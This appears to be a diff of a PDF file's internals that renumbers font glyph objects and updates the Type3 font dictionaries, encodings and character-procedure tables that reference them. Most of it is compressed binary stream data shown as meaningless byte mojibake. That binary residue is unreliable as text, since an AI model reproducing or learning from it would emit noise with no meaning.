Ÿ¨ NÔÇ÷9LÕxoéá ÿádÔÿ™‹„sù¾á-ÿ5Š•P endstream endobj -1150 0 obj << +1201 0 obj << /Length 140 /Filter /FlateDecode >> @@ -7630,7 +8017,7 @@ stream xÚ35Ô³T0P0bKSs…C®B.S ßÄI$çr9yré‡+˜˜ré{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]þÿÿÿ€™dü€þ3 eR/i& 0È ò‚d“Ì`’LÊ?`üßÀðÿÁ@!¹\=¹¹Afl÷ endstream endobj -1151 0 obj << +1202 0 obj << /Length 244 /Filter /FlateDecode >> @@ -7643,7 +8030,7 @@ ur( NZ@fWðí¤'c´ÔÒÇýoÊÀQŒü¦Â! endstream endobj -1152 0 obj << +1203 0 obj << /Length 243 /Filter /FlateDecode >> @@ -7651,7 +8038,7 @@ stream xÚUпJÄ@ð/.0…ûfŸÀMNÖ?óSge!Vji¡hkRù\AKÁTÖ©$EØuwöŠM1üøf`Šï`¹·<’…Üw£¥>”w%=’Ö.>úÃí­jRWRkRçnKª¾ÏO/÷¤V›SY’ZËëR7T¯¥µ@fµm óÀ¦‡í¼ÅÏ0 à{d¾¦˜üۘÎ=õ4]LÕ3ùȦ€aÒ@b·´liº@ÏT|`Ä“MLjbËÀ¾Å4ŸLõ“ÿ1ÂÄdtFÀœW$®Gœ á*Ã.|ר™±ÕtIÿ6D†c endstream endobj -1153 0 obj << +1204 0 obj << /Length 239 /Filter /FlateDecode >> @@ -7660,7 +8047,7 @@ xÚ­ ~ÐjÔ…}Á<ÛC¿2[|Žþfa?­-ÈÖžÆ3ë ñ“­oŒ×œÈ¾}°]Ñ=ÂUŠ;ü”K‰É endstream endobj -1154 0 obj << +1205 0 obj << /Length 167 /Filter /FlateDecode >> @@ -7669,7 +8056,7 @@ x Y;ªÑPû ¶CÝuP7ÈÙÿÀÔˆ ƒ™….ĵ˜—«'W ŽK€¿ endstream endobj -1155 0 obj << +1206 0 obj << /Length 309 /Filter /FlateDecode >> @@ -7678,7 +8065,7 @@ xÚ­ Bà<ÁZYˆÕii¡(6‡Y±õ¡ò>D|I™"Ü:³$EÀÒò…Ù™Ù™ÿ/²Ãü˜Êé -¨àŸºKõ£Î3Ž&t”G›½¬t|My¦ã Žë¸ZÓóÓË½Ž——g”êxE7)%·ºZà[ÈÙV°óþz=ÞªEd€°‘¥ê€šKzNä¬.{7Aâ|®Œ$sQèЄÒ>j"‡vDÉmvsÔý#ƒL°ÿb~ÃüöùdóáGŒûñ¶[ÞVužeø½ÿajÖEyȳv¾Y©:À†%*?ñʵÑJî¤~D`q£ìû€@\qðíBìcáÌšpê`¶èŽÐþ ™j‚óÚ·²<§Øq}^é+ý 6²¥É endstream endobj -1156 0 obj << +1207 0 obj << /Length 221 /Filter /FlateDecode >> @@ -7689,7 +8076,7 @@ xڕѽ óäžê ×´ 2Ùàãþ¼€œo¨@.ñ 08B²D­uåÐ uf,HW§‚ ô¥lüfëç¬(ºz¥eõ§Ö~ûüæÞ¦Øô§¹_Qš@™ñÍëõ6Ò+L®6ŸñeålóZ¹šÿ«›v,X¿ÕKéP~ï‡ÞEÔºe¯Ö©úN=â’¹«vð™<›Â endstream endobj -1157 0 obj << +1208 0 obj << /Length 256 /Filter /FlateDecode >> @@ -7697,7 +8084,7 @@ stream xÚUϱNÄ0 à¿Ê)K¡~h{=îÄB¤ãè€Ó ˆ @°!ZÞ̉èF%Psw ²|Jì8¶ç‹Ãª¦’æt0£ùŒŽŽé®r®^j°¤EµËÜ>¸U㊠ÕKWœkØÍ=?½Ü»buyJz_ÓuEåkÖ?€ÆŒ!òÎf°l#>Ù3ZÎ;@Î'€ç7Àîx ïÉ&Œ&È–Nm9ƒR0—!¡G/aEïFD+E$½ÑŒµ²MX‰¿„^É>a‡-úÆü‘Mˆÿèû=¦×:upÇ´–¤-µiÞ}õèGŒˆA§Š^{s¦ywÖ¸+÷=Ÿ†# endstream endobj -1158 0 obj << +1209 0 obj << /Length 150 /Filter /FlateDecode >> @@ -7706,7 +8093,7 @@ x äWÎr° endstream endobj -1159 0 obj << +1210 0 obj << /Length 191 /Filter /FlateDecode >> @@ -7716,7 +8103,7 @@ x \3X~ZPCAù©J'BEH?4€þ—ºôuâ7{©-'¿ROrï%ËxºVÝ™‹Ã·¹CÙ ï qBszØxaº endstream endobj -1160 0 obj << +1211 0 obj << /Length 240 /Filter /FlateDecode >> @@ -7725,7 +8112,7 @@ x íd› endstream endobj -1161 0 obj << +1212 0 obj << /Length 307 /Filter /FlateDecode >> @@ -7735,7 +8122,7 @@ x Hl ¿¥½8@£ÁŠwdFUšì¨%[pù¤^q(é`J7)¯Iˆ’›ÑMk¯T¢äRÙñRI JN%}¤½Ö<=“Dt2l¥IÜ©yÑÑ&ôFš:Uï; ôAš9ÉOŠ} ô5*¡¿­ºÿÄÿ‰°­ ÄœŒE'"'íEÑ<´¾¦®_g'µ¸ßÑÆ©Ñ endstream endobj -1162 0 obj << +1213 0 obj << /Length 279 /Filter /FlateDecode >> @@ -7746,7 +8133,7 @@ x ¢–ƒöàØÞW¾œÌÈCeàË  »ä›PIÂ{Á7™½]øоiՈݱúªÑ·úR}Ý endstream endobj -1163 0 obj << +1214 0 obj << /Length 231 /Filter /FlateDecode >> @@ -7754,7 +8141,7 @@ stream xÚÍαJAàYÈÁL›"y÷.p1©b¯L•BAS¦P´Î=’p²2EÈ8»n@ô,†ofgÙ§“ËÉŒK®´¦×WüRÑ+ÕsË8ÆÅó– ¹5×sr·zJ®¹ã÷· ¹Åý5Wä–ü 7©Y²È ð~k%…öÒvìT²Z^{ÓcÝÙ³ ÷ÃâôU«o²CÕ0Ë–*¤ÅSTB¶‹ú`ζÑñÞ&‡í%‹ãE¶Ÿ´§QÒÈ0›b4è3¾Ýe}÷¿Íÿô"Ý_馡}Èl® endstream endobj -1164 0 obj << +1215 0 obj << /Length 204 /Filter /FlateDecode >> @@ -7763,7 +8150,7 @@ x Â@à . ´Vf. ›´1àL!he!Vji¡(X›£å({„”Á8ë£—åø‡ùÝéÅQ—Úš’˜º}Úi<"ÏÈŃ÷f{ÀQ†jÅ{T3ŽQes:Ÿ.{T£Å˜4ª ­5EÌ&¡€º6äü¥…°%/_x÷/PAP02gøýÁ0Ò¦–yp&îî¬dBw›:Œ+0ðÁüâ}¨AT¾yóMÞ6Ó¢5lö–¢.Ë5²Ài†K|¤øT£ endstream endobj -1165 0 obj << +1216 0 obj << /Length 198 /Filter /FlateDecode >> @@ -7771,7 +8158,7 @@ stream xÚ31Ó34V0P0RÐ5T01V0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEùÃT‚D0S$ê00|`ÇÀü¹A¾ù;ÿæ ì˜ÿå˜00þ* àÄ?8Q"êI&êPMÊøbÛ½`Ëßœq ä ã ò Ìê˜þÿ:]þ—«'W ÈckA endstream endobj -1166 0 obj << +1217 0 obj << /Length 182 /Filter /FlateDecode >> @@ -7782,7 +8169,7 @@ xÚ w§”§ÍSZÓ»= endstream endobj -1167 0 obj << +1218 0 obj << /Length 198 /Filter /FlateDecode >> @@ -7790,7 +8177,7 @@ stream xÚ31Ó34V0P0VÐ5T01Q0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEÿó‚ÁþT‚zó !ÿHÔ±÷`øÁøþó†ú쀶¤ „|P±=˜i«‡u âÉDª)öph‘<„ÚkrF=ÈAï?0þ`<ÿŸ¡†½ÿ?ƒü?þÿ ì@‡s¹zrroXhI endstream endobj -1168 0 obj << +1219 0 obj << /Length 189 /Filter /FlateDecode >> @@ -7800,7 +8187,7 @@ x qáÁ23ü;èö9änÀ¶ÏvÈû€ÎdC)úlGUgw¤IBfÍ6$3—2™dÁ×Ëí@f²œr@&æm)‰Ú¸·2Ï©\^¡sϵ2¸Î÷¯HÅøQ‰RñþQÖOþø—Ö5ÉQÑJrµìhè M£íÂá„TårL¼@³„Vô½£@ endstream endobj -1169 0 obj << +1220 0 obj << /Length 141 /Filter /FlateDecode >> @@ -7808,7 +8195,7 @@ stream xÚ32Õ36W0P0bcSK…C®B.# ÌI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]ê˜ÿ70ð|À ßþ€ÁžÿCÿ`ÆÌ00ŠÿÿÿÇäè§3ÿa`¨ÿÿ޹\=¹¹¢&[ endstream endobj -1170 0 obj << +1221 0 obj << /Length 237 /Filter /FlateDecode >> @@ -7816,7 +8203,7 @@ stream xÚ¿J1Æ¿00…ñ v^@³9ïäŠÃ…ó·´²+µT´[¸}´> @@ -7826,7 +8213,7 @@ x Ì€à?É&™iN‚ìaþ`ÿD~°’È700nà?ÀÀüDþ“ØÀÈä‡$Ù€‚ëÿÿƒÿÿ7 “\®ž\\y endstream endobj -1172 0 obj << +1223 0 obj << /Length 122 /Filter /FlateDecode >> @@ -7834,7 +8221,7 @@ stream xÚ32Ö30W0P0aCS3…C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜ø0È@A@ 8~Àüá? ±q©ŽØ0üÿ‚¸\=¹¹(CE` endstream endobj -1173 0 obj << +1224 0 obj << /Length 150 /Filter /FlateDecode >> @@ -7845,7 +8232,7 @@ x @Q…h ®X.OÆ ìø   P?`üÁð†Ø€¸ôE6Œ?êügüðŸ‚üc?PÃ~À†Ÿÿó.WO®@.ÿ§Wõ endstream endobj -1174 0 obj << +1225 0 obj << /Length 196 /Filter /FlateDecode >> @@ -7854,7 +8241,7 @@ xÚµ Â@Еir3'p.#˜BÐÊB¬ÔRPQ°ÍÑr±0EÈ:? êdÙ³3ó7èuÂ.{Œô¸òʧãH‰ÆrCqJzÆGz$¯¤Ó1öÇ5éx2`ŸtÂsŸ½¥ […RÊüâë?´LõºæÝ3Ø‚ærÁÊkm‚¨„;xÔÂ3êH†Kv¤Ø@%¯â.êýoÔ nn—**ŒÉù@Ô¦ôDr endstream endobj -1175 0 obj << +1226 0 obj << /Length 108 /Filter /FlateDecode >> @@ -7862,7 +8249,7 @@ stream xÚ32Ö30W0P0aCS …C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?0ü‡!þ ̃±ÿ`øÿÿq¹zrrÆ‚Q. endstream endobj -1176 0 obj << +1227 0 obj << /Length 177 /Filter /FlateDecode >> @@ -7870,7 +8257,7 @@ stream xÚ3³Ô3R0Pa3scs…C®B.3 ßÄI$çr9yré‡+˜™pé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?ð`Àðÿƒý†ú@úƒ=ãƒ:†ÿÈ77Ø3ðnà?Î ßÀüÿˆþÇÀDÿa`ÿÁÀNÿ``ÿ€þÀÀþ`Ð O€âÿÿƒÿÿ7ÿÿNs¹zrr#߈ endstream endobj -1177 0 obj << +1228 0 obj << /Length 147 /Filter /FlateDecode >> @@ -7880,7 +8267,7 @@ x Ìø?00üÿ`ÿD~°’È70ðnà?ÀÀüDþ“ØÀÈä‡$Ù0½ñÿÿÁÿÿI.WO®@.‡e% endstream endobj -1178 0 obj << +1229 0 obj << /Length 188 /Filter /FlateDecode >> @@ -7890,7 +8277,7 @@ xÚ éáwlzZÚÑIKÚ endstream endobj -1179 0 obj << +1230 0 obj << /Length 196 /Filter /FlateDecode >> @@ -7899,7 +8286,7 @@ xÚα Â@ àH†B¡y½ž­uj;:9ˆ“::(ºÚ>Z¥p"ØŠç]qÐQ |CB’?Šû2ä€Ü“1G!‡#ÞI:R°«aøm”d$V$f¶O"›óùtÙ“H–$R^K6”¥ŒÊ¯À¨\ƒ¹UW0÷Â/¼º%>Á«°T¨5*è´4hy~“ÿÌ÷ö²¥ý¦Ýß> @@ -7908,7 +8295,7 @@ x äFºf# endstream endobj -1181 0 obj << +1232 0 obj << /Length 140 /Filter /FlateDecode >> @@ -7916,7 +8303,7 @@ stream xÚ36Ò35R0PacCcs…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ØÈ3üPàÿÃÇþ?nÿÀÿœýó3 ~Äo˜0ÿah`þÁÀ€‚?P³Íüÿÿs¹zrrjÙF„ endstream endobj -1182 0 obj << +1233 0 obj << /Length 195 /Filter /FlateDecode >> @@ -7926,7 +8313,7 @@ x Wî£í£ÄÊ6`“"8Î%GŠ™ùÿfŠ|q~ÆK.ø4p¡ó‚½R^j¨çåÔ<> @@ -7940,7 +8327,7 @@ x  Ø W á Œ@Ì Äì@,ÿÿ?Ã(f„ÊQ „þ0‚pC sC3ƒ=;ÿ?°f.WO®@.uH– endstream endobj -1184 0 obj << +1235 0 obj << /Length 153 /Filter /FlateDecode >> @@ -7951,7 +8338,7 @@ x @Q…h žX.Oæ ìþ`üJò`À‘p’ƒºBþ`°ÀÀðƒ¡üÆçÿì™Iùÿí@’ùÐ.WO®@.1c endstream endobj -1185 0 obj << +1236 0 obj << /Length 183 /Filter /FlateDecode >> @@ -7961,7 +8348,7 @@ x œÒ.Á.X ,g0i)à <¡¥©¡pƒ¶&†®A†=éjœ|c(v‘kØ]þb=ÀÐ(Ô¿áúO¨ÁI† |F£?ê endstream endobj -1186 0 obj << +1237 0 obj << /Length 233 /Filter /FlateDecode >> @@ -7970,7 +8357,7 @@ x ÖQ|A7©‘|±€Ð~Lïx‡`¼7UÓN?8gù«áá°Ï!ñAÄjÀÝÏ"z$¥ìr·¿~nîh”¼d¥HžÚ™drÆÏO/·$GçcŽHNø*âðš’ WUPñ÷6¾Aß´4æðŠ5¹§q ‘þ" bxØ%âtÇq¿Á_ù®cùGˆÅ²h;²š÷L€ Ëtè5Â<þfúOk…2·|âµÁ+ñ–ZlECÝdÑ ±ï(°ç˜ÂÑIBô¥Y_™ endstream endobj -1187 0 obj << +1238 0 obj << /Length 210 /Filter /FlateDecode >> @@ -7980,7 +8367,7 @@ x Õºëû–ëû-Ö,µ¯Ø’ÿ^9â\ŽÈu7ép38oÝÖº|U%4£Ã#N¤ endstream endobj -1188 0 obj << +1239 0 obj << /Length 219 /Filter /FlateDecode >> @@ -7989,7 +8376,7 @@ x Î èn²Zõ$¨sÚSE¨GÁ½‰æÑöQ|„x ‰³²Iéå;üÃüü=ÝF¤(¢N8 ^DúÖ!þ qª¨¯ÝiµÅIŒò‹ôåœs”ñ‚ö¿‡ ÊÉÇ”B”3úI-1žQY¦ãâàAægà//7ˆœŽ4gËZŽvª*Ì 0‰Ã¿˜Š+ã]S‡¸CEÉ@QsüϰFÕì,IqSn/¼'¶’gCþbŸ^m‘mjg`ç1øã'>ÚŸKø endstream endobj -1189 0 obj << +1240 0 obj << /Length 183 /Filter /FlateDecode >> @@ -7998,7 +8385,7 @@ x Â@„á‘@„‡$|'0‰+AA¢‚)­,D¨¥ ¢æQ<‚eŠ`œÅ_ìì·°&î# µÇL_M¬‡H.bìÚ£½ØŸ$I%ب‰$Xp• ]êíz?J¬¦Êu¦[>ÙI:ÓIU•uO§Ã)Fh~ðß!;£ó:còÌÛዬQÖ‘‚ôŸÿ)HÿåpIëH]R·YÀ#õH[¤mé(œ²âl2Oe-?uàC endstream endobj -1190 0 obj << +1241 0 obj << /Length 188 /Filter /FlateDecode >> @@ -8008,7 +8395,7 @@ xÚµ A+ ±RK EÁBb޶GÉR¦R×l´6¯˜˜ÿþPtÌ+îǬƬ5$Ii;ŒXÜf¢$#±a¥I,ì˜D¶äëåv$‘¬f,I¤¼•í(K~ |[äj¿„W¢‚opGÏà ÀÄ!´—S‹¢E¦ /‹òèzù´ÌO¾6x+Ó¸YÛ~åÕÎÜuдñí…æ­éÂÕ`ú endstream endobj -1191 0 obj << +1242 0 obj << /Length 121 /Filter /FlateDecode >> @@ -8016,7 +8403,7 @@ stream xÚ31Ô35R0P0bc3SS…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]0001;Ëñÿ ÿaX*6T°ý†úÿÿ?À0—«'W ¾NÚ endstream endobj -1192 0 obj << +1243 0 obj << /Length 228 /Filter /FlateDecode >> @@ -8025,7 +8412,7 @@ x %‡s„'äƒlÏ"³ÈÌñ¥™aAZÒ›M°¿ÈY'Wò TŸc| endstream endobj -1193 0 obj << +1244 0 obj << /Length 235 /Filter /FlateDecode >> @@ -8033,7 +8420,7 @@ stream xÚuÐ1NÄ0ЉRXšß`3', ZiY$R AE¨€ ´ØGóQr„”[¬0¼„‰"OÊŒóÇ“ãîÈ/¥•^—ÒŸ‰÷òØñ+÷ÅVüɾóðÌëÝ­ôžÝ%Êì†+yûxb·¾>—ŽÝFî:iïyØ™-­2È9QµµÕ EëPõE6‚f¤LÍôV»&‘ÆàðÌÔb&e6‚€§Ñf“õÕŽó‘òY (yâ/ifU ý°Å_ cBüÔ¨M>Õ‹ý‚¸Ÿ™°y¥ÿ€‚޵¸2_ |ÃßÇ›jh endstream endobj -1194 0 obj << +1245 0 obj << /Length 188 /Filter /FlateDecode >> @@ -8043,7 +8430,7 @@ xڕν ØÀ©iƒèA«äf°1ë€h‚.p;»Áö`¯Z  \2ðoóŠß›ÿÂy™³54Ö4§òý`ö endstream endobj -1195 0 obj << +1246 0 obj << /Length 226 /Filter /FlateDecode >> @@ -8052,7 +8439,7 @@ xÚ•Ï¿jA ìnÍG¹G°´8ÜÌœEH:›_1;ödÏyŸSp¯ÏnÈyΟíÉ9)¦œ¿Ü_6[šd?Ø9²oR&[Ìùð}ü";YL9#;ãeÆéŠŠÇÀŒÇæÒºÂ„ÐpQ*Å+j .+xsº7á”xÄ•‘Íç–Üð‘\ƒ }µrÓþ† ”¿ø´•R þ/:tK­¬uéîNTc¨'Û¼‰Ä'ò¡jìiT”2ƒ®D¥×‚Þé+XÑ endstream endobj -1196 0 obj << +1247 0 obj << /Length 243 /Filter /FlateDecode >> @@ -8060,7 +8447,7 @@ stream xÚm½JÄ@…OØ"p›¼ÁÎ}d³ƒÚXW0… •… j)¨hëäÑò(ó)S„ÏD…m>†{çüÜuuìVZj­G+­ÏÔ9}ªäMjÇa©îägóø"›VìÖNìÇbÛkýxÿ|»¹¹ÐJìVï+-¤Ý*Ðô@ P„sŽºø‚&¾³¾[ D>#E@ƒ¢Ç†r˜Iõ~2û> @@ -8071,7 +8458,7 @@ xڕα d“_Ñ®Ó+ÈJ¢_<ÿ!’¯tùâ<Á5~lúQ- endstream endobj -1198 0 obj << +1249 0 obj << /Length 265 /Filter /FlateDecode >> @@ -8080,7 +8467,7 @@ x À`;d1ëa¶°3X`LpÀM6{ä{xÖSÏœ˜°Hpžî|tO¥0£1l¹6Ì ùi4ÈþÓ,ìÀe3zŸÓáw™gRÒô¦SÅß@v伕+ùÿcå endstream endobj -1199 0 obj << +1250 0 obj << /Length 237 /Filter /FlateDecode >> @@ -8089,7 +8476,7 @@ x ¶¤AKr®â›ì!eŠ3³ ˆšgiÿ_×'aE5t¼¢æŒB ÇŸ± 2¬(œÎ_žpÓ¢¿¥& ¿”1úöŠ^_Þvè7×çT£ßÒ]MÕ=¶[‚b—….'0SÉ2*(ÙŒ`&p ÞÁõBì!Ît ç¼àÒð_èÝ_èR¥c§Ø™%Éž 6{6Cñ!I¬cˆ“Ä)A×ô?€Ö«ÌÁ“ôXZ1IÁØËN+éOVë”ùÀäqY‰-Þàú m9 endstream endobj -343 0 obj << +339 0 obj << /Type /Font /Subtype /Type3 /Name /F15 @@ -8098,96 +8485,96 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 21 /LastChar 122 -/Widths 1200 0 R -/Encoding 1201 0 R -/CharProcs 1202 0 R +/Widths 1251 0 R +/Encoding 1252 0 R +/CharProcs 1253 0 R >> endobj -1200 0 obj +1251 0 obj [41.52 0 0 0 0 0 48.44 46.13 46.13 69.2 0 0 0 41.52 0 0 0 0 23.07 32.29 32.29 0 0 23.07 27.68 23.07 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 23.07 23.07 0 0 0 0 0 62.28 58.82 59.97 63.43 56.51 54.2 65.16 62.28 29.99 42.67 64.58 51.9 76.12 62.28 64.58 56.51 64.58 61.12 46.13 59.97 62.28 62.28 85.34 62.28 62.28 0 0 0 0 0 0 0 41.52 46.13 36.91 46.13 36.91 25.37 41.52 46.13 23.07 25.37 43.82 23.07 69.2 46.13 41.52 46.13 43.82 32.52 32.75 32.29 46.13 43.82 59.97 43.82 43.82 36.91 ] endobj -1201 0 obj << +1252 0 obj << /Type /Encoding /Differences [21/a21 22/.notdef 27/a27/a28/a29/a30 31/.notdef 34/a34 35/.notdef 39/a39/a40/a41 42/.notdef 44/a44/a45/a46/a47/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58/a59 60/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73/a74/a75/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85/a86/a87/a88/a89 90/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121/a122] >> endobj -1202 0 obj << -/a21 1133 0 R -/a27 1136 0 R -/a28 1135 0 R -/a29 1137 0 R -/a30 1138 0 R -/a34 1134 0 R -/a39 1126 0 R -/a40 1124 0 R -/a41 1125 0 R -/a44 1127 0 R -/a45 1132 0 R -/a46 1128 0 R -/a47 1129 0 R -/a48 1190 0 R -/a49 1191 0 R -/a50 1192 0 R -/a51 1193 0 R -/a52 1194 0 R -/a53 1195 0 R -/a54 1196 0 R -/a55 1197 0 R -/a56 1198 0 R -/a57 1199 0 R -/a58 1130 0 R -/a59 1131 0 R -/a65 1139 0 R -/a66 1140 0 R -/a67 1141 0 R -/a68 1142 0 R -/a69 1143 0 R -/a70 1144 0 R -/a71 1145 0 R -/a72 1146 0 R -/a73 1147 0 R -/a74 1148 0 R -/a75 1149 0 R -/a76 1150 0 R -/a77 1151 0 R -/a78 1152 0 R -/a79 1153 0 R -/a80 1154 0 R -/a81 1155 0 R -/a82 1156 0 R -/a83 1157 0 R -/a84 1158 0 R -/a85 1159 0 R -/a86 1160 0 R -/a87 1161 0 R -/a88 1162 0 R -/a89 1163 0 R -/a97 1164 0 R -/a98 1165 0 R -/a99 1166 0 R -/a100 1167 0 R -/a101 1168 0 R -/a102 1169 0 R -/a103 1170 0 R -/a104 1171 0 R -/a105 1172 0 R -/a106 1173 0 R -/a107 1174 0 R -/a108 1175 0 R -/a109 1176 0 R -/a110 1177 0 R -/a111 1178 0 R -/a112 1179 0 R -/a113 1180 0 R -/a114 1181 0 R -/a115 1182 0 R -/a116 1183 0 R -/a117 1184 0 R -/a118 1185 0 R -/a119 1186 0 R -/a120 1187 0 R -/a121 1188 0 R -/a122 1189 0 R +1253 0 obj << +/a21 1184 0 R +/a27 1187 0 R +/a28 1186 0 R +/a29 1188 0 R +/a30 1189 0 R +/a34 1185 0 R +/a39 1177 0 R +/a40 1175 0 R +/a41 1176 0 R +/a44 1178 0 R +/a45 1183 0 R +/a46 1179 0 R +/a47 1180 0 R +/a48 1241 0 R +/a49 1242 0 R +/a50 1243 0 R +/a51 1244 0 R +/a52 1245 0 R +/a53 1246 0 R +/a54 1247 0 R +/a55 1248 0 R +/a56 1249 0 R +/a57 1250 0 R +/a58 1181 0 R +/a59 1182 0 R +/a65 1190 0 R +/a66 1191 0 R +/a67 1192 0 R +/a68 1193 0 R +/a69 1194 0 R +/a70 1195 0 R +/a71 1196 0 R +/a72 1197 0 R +/a73 1198 0 R +/a74 1199 0 R +/a75 1200 0 R +/a76 1201 0 R +/a77 1202 0 R +/a78 1203 0 R +/a79 1204 0 R +/a80 1205 0 R +/a81 1206 0 R +/a82 1207 0 R +/a83 1208 0 R +/a84 1209 0 R +/a85 1210 0 R +/a86 1211 0 R +/a87 1212 0 R +/a88 1213 0 R +/a89 1214 0 R +/a97 1215 0 R +/a98 1216 0 R +/a99 1217 0 R +/a100 1218 0 R +/a101 1219 0 R +/a102 1220 0 R +/a103 1221 0 R +/a104 1222 0 R +/a105 1223 0 R +/a106 1224 0 R +/a107 1225 0 R +/a108 1226 0 R +/a109 1227 0 R +/a110 1228 0 R +/a111 1229 0 R +/a112 1230 0 R +/a113 1231 0 R +/a114 1232 0 R +/a115 1233 0 R +/a116 1234 0 R +/a117 1235 0 R +/a118 1236 0 R +/a119 1237 0 R +/a120 1238 0 R +/a121 1239 0 R +/a122 1240 0 R >> endobj -1203 0 obj << +1254 0 obj << /Length 120 /Filter /FlateDecode >> @@ -8198,7 +8585,7 @@ x @Q…h ¦X.O…ú˜ù@aƒ<2È3Ø¡Ö1Ô€á.WO®@.z½,8 endstream endobj -1204 0 obj << +1255 0 obj << /Length 288 /Filter /FlateDecode >> @@ -8207,7 +8594,7 @@ xڵѽJ ¹ÂÏgä;¥Õ)‹œšW$_­$¢4f¬ds5˜½ù¡Üå° endstream endobj -1205 0 obj << +1256 0 obj << /Length 307 /Filter /FlateDecode >> @@ -8218,7 +8605,7 @@ xÚ• ±ÿ„¨¤ÂѲ«^jlgˆª˜¢©è;9„„MhÇ»àÝ@ôlâÙ&±k«Ñk xÑá ~ZµÕÄ endstream endobj -1206 0 obj << +1257 0 obj << /Length 95 /Filter /FlateDecode >> @@ -8234,7 +8621,7 @@ x ÿŒDÈåêÉÈõéS endstream endobj -1207 0 obj << +1258 0 obj << /Length 257 /Filter /FlateDecode >> @@ -8243,7 +8630,7 @@ x ÆØGÆ¨í ²4€klñü@´ŸHIwÙm,Ï‚ÎÈeôŠ(€nD¿÷˜Ã'„_û™þ†Dô;ìð/ГF/ô <“ endstream endobj -1208 0 obj << +1259 0 obj << /Length 187 /Filter /FlateDecode >> @@ -8254,7 +8641,7 @@ Q RœÙ!/®™”‘¥¦¾ðü*’x½éx¦“ü…žñAö…ß_¢ƒX'út ÿä endstream endobj -1209 0 obj << +1260 0 obj << /Length 294 /Filter /FlateDecode >> @@ -8262,7 +8649,7 @@ stream xÚå’1N„P†‡lA2 G`. Üݬ[½d])L´²ØX¹–­áh K G ¤ ;μ¨Ä-­–>Âdþ7üÿœž')%”Îèh:¥ÅLïmŠ8_Êg)$‹¾x÷€« Í Í—h.´‚&»¤ç§—{4««3JѬi#r·˜­ ¢V\s¡ ™+eÌ\+sæVÉÌ;á›…ïÊøc'ÒüYCìDJE@khpªy£¯¶õŒ…µN r&„'¬ó|3X8˜yÏò7í>Vžñ?ÓŽ¹gžñÜùßÿŒüP~ú¦¬}¢ƒ¿ÎïÞŸ‡Ë…µÝç¹ü*°.Ï6òíóÖü_…M·n/¬F-Œº½™p·G¶òtסÏ3¼Æ/v¨R: endstream endobj -1210 0 obj << +1261 0 obj << /Length 289 /Filter /FlateDecode >> @@ -8270,7 +8657,7 @@ stream xÚåÒ¿NÃ0pG"ÝÒGȽ8¡”¦S¥R$2 ÁÄ€˜€‘³óhy?BÆQŽÏ¢”±11ý$'gŸïsuvZ”\pÅ'Ë%_T¼>çç’ÞhµÁjÁe±Žßž^iW“¾çÕ†ôµû@º¾á÷ÏÒ»ÛK.Iïù›=R½g¥”´ÊX¥29xs¼F¤‰ˆ´0…Ìà.`sé²n¥Iš¥»aÍ&Ò¹-a«PcSiÜQ'§b³!¸èar$Êњͻïn­ÓL¶A3·ùY™«þØæ÷~æ}÷™ß3ÜßLóˆóñs:šÛ8Ï,Îwšw˜?~‰yt>%(ô¹‰JCŽ6¹N9¹ÛøÆwßIßõºdïú?KW5ÝÑbÄ0Î endstream endobj -1211 0 obj << +1262 0 obj << /Length 174 /Filter /FlateDecode >> @@ -8279,7 +8666,7 @@ x Â@àI%Ì%2'p³ù!X 1‚[ZYˆ•ZZ(ZG±°ôÅÅ#¤Lg„‚'°ùàÍc^wÃdc! )ieq‹Q*9Ðøn–ÌšE)š‘œÑ¸1íw‡5šl2 ‹&§¹¥`.'ðj>‚¯‚ÇBGñ•¾R(ü>q|æøÂ|m„[­T½l‘-A¶å©¥Qêoª” Nñ]0ªù endstream endobj -1212 0 obj << +1263 0 obj << /Length 290 /Filter /FlateDecode >> @@ -8287,7 +8674,7 @@ stream xÚ•‘½NÃ@ Ç]e¨äåáüD%-L•J‘È€bF$@°!Ý=Z%1Âø# 0ÖÃýtöÙ翽®«3ªè„ŽjjNiÓÐc¯Ø¬ÄYÑf푇gܵXÞR³ÂòRÜX¶Wôþöñ„åîúœj,÷tWSuížw Æü-ç’Y¯Q0$6/«å…¡+K`Ë]`€‚sÐÜ”£ä@ÌqÐJy«Xäm¯åaBêE?‡ÕŒŽ/CdÃ$$°EImŽõ‘6ß›J»ª0ÍwµÁƒ…‹þ}|"úvVOEÏ>+Øûš†]:â8G8qª2¼xÍOGò©Ø”¸× î´ÕÀ™e9I¡fbEŠîT„é†%lKí}ÓùoL. /Z¼ÁZÎD endstream endobj -1213 0 obj << +1264 0 obj << /Length 186 /Filter /FlateDecode >> @@ -8297,7 +8684,7 @@ x A+ ±RK Eëx¯âMô–SHÖ_A°¶rŠù`^L»ÙˆÄâR©;iµ%OdéxÃY‚j,yúj-ÖÜ-ØN%KØQg[Œd·Ý¯ØvÇ=qlû2é9}ñ'"2úçWt¾Q~àß\ˆjO¯%Á•(ŠmPað¬ý Œä›Ñ¨Ñ\Œà`´æ}…_¨ô×ö‰xPð„ïbàùY endstream endobj -342 0 obj << +338 0 obj << /Type /Font /Subtype /Type3 /Name /F17 @@ -8306,31 +8693,31 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 39 /LastChar 117 -/Widths 1214 0 R -/Encoding 1215 0 R -/CharProcs 1216 0 R +/Widths 1265 0 R 